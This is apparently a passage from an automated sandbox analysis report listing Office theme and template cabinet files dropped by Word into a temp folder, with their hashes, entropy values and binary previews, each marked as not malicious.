                                                                                                                                                Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6D46.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):42788
                                                                                                                                                Entropy (8bit):7.89307894056
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                                                                                                                                MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                                                                                                                                SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                                                                                                                SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                                                                                                                SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6EDD.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):222992
                                                                                                                                                Entropy (8bit):7.994458910952451
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                                                                                                                MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                                                                                                                SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                                                                                                                SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                                                                                                                SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6F0D.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):276650
                                                                                                                                                Entropy (8bit):7.995561338730199
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                                                                                                                MD5:84D8F3848E7424CBE3801F9570E05018
                                                                                                                                                SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                                                                                                                SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                                                                                                                SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6F0E.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):271273
                                                                                                                                                Entropy (8bit):7.995547668305345
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                                                                                                                MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                                                                                                                SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                                                                                                                SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                                                                                                                SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6F1F.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):261258
                                                                                                                                                Entropy (8bit):7.99541965268665
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                                                                                                                MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                                                                                                                SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                                                                                                                SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                                                                                                                SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6F20.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):307348
                                                                                                                                                Entropy (8bit):7.996451393909308
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                                                                                                                                MD5:0EBC45AA0E67CC435D0745438371F948
                                                                                                                                                SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                                                                                                                                SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                                                                                                                                SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6F21.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):295527
                                                                                                                                                Entropy (8bit):7.996203550147553
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                                                                                                                MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                                                                                                                SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                                                                                                                SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                                                                                                                SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6F60.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):230916
                                                                                                                                                Entropy (8bit):7.994759087207758
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                                                                                                                                MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                                                                                                                SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                                                                                                                SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                                                                                                                SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab70AA.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):550906
                                                                                                                                                Entropy (8bit):7.998289614787931
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                                                                                                                MD5:1C12315C862A745A647DAD546EB4267E
                                                                                                                                                SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                                                                                                                SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                                                                                                                SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab7166.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):723359
                                                                                                                                                Entropy (8bit):7.997550445816903
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                                                                                                                MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                                                                                                                SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                                                                                                                SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                                                                                                                SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab7177.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):640684
                                                                                                                                                Entropy (8bit):7.99860205353102
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                                                                                                                MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                                                                                                                SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                                                                                                                SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                                                                                                                SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab71C6.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):698244
                                                                                                                                                Entropy (8bit):7.997838239368002
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                                                                                                                MD5:E29CE2663A56A1444EAA3732FFB82940
                                                                                                                                                SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                                                                                                                SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                                                                                                                SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                                                                                                                Malicious:false
